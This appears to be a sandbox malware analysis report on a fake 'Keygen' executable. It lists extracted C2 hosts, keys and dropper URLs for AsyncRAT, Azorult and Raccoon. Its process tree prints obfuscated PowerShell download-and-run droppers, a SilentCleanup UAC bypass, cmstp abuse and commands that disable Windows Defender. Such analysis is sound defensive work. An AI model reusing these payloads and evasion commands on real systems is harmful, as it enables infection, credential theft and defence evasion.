Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
1803s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 14:18
General
-
Target
Keygen.bin.exe
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhHT
exe.dropper
http://bit.do/fqhHT
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://zxvbcrt.ug/zxcvb.exe
exe.dropper
http://zxvbcrt.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJv
exe.dropper
http://bit.do/fqhJv
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://pdshcjvnv.ug/zxcvb.exe
exe.dropper
http://pdshcjvnv.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJD
exe.dropper
http://bit.do/fqhJD
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://rbcxvnb.ug/zxcvb.exe
exe.dropper
http://rbcxvnb.ug/zxcvb.exe
Extracted
Family
raccoon
Botnet
c6f4c67877b4427c759f396ca4c1dff4761d3cc9
Attributes
-
url4cnc
https://telete.in/brikitiki
rc4.plain
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
asyncrat
Version
0.5.7B
C2
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
Mutex
AsyncMutex_6SI8OkPnk
Attributes
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
aes.plain
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Async RAT payload 3 IoCs
-
ModiLoader First Stage 2 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 34 IoCs
-
Loads dropped DLL 18 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
-
Suspicious use of SetThreadContext 12 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 4 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\797B.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\797B.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\pnc.exe"C:\Users\Public\pnc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4688 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\468043462435068\\* & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 46889⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\pnc.exe"C:\Users\Public\pnc.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Yms5gMrn3A.exe"C:\Users\Admin\AppData\Local\Temp\Yms5gMrn3A.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\kNhjQtso.bat" "9⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\kNhjQtso.bat" "9⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\joazwkiz.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\pnc.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ldz.exe"C:\Users\Public\ldz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5152 & erase C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe & RD /S /Q C:\\ProgramData\\248482891706359\\* & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 515210⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"{path}"7⤵
- Executes dropped EXE
-
C:\Users\Public\ldz.exe"{path}"6⤵
- Executes dropped EXE
-
C:\Users\Public\ldz.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\v15Xka8Ssx.exe"C:\Users\Admin\AppData\Local\Temp\v15Xka8Ssx.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xxs1lihx.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\ldz.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\adv.exe"C:\Users\Public\adv.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\s4drbjpj.exe2⤵
-
C:\Windows\temp\s4drbjpj.exeC:\Windows\temp\s4drbjpj.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
-
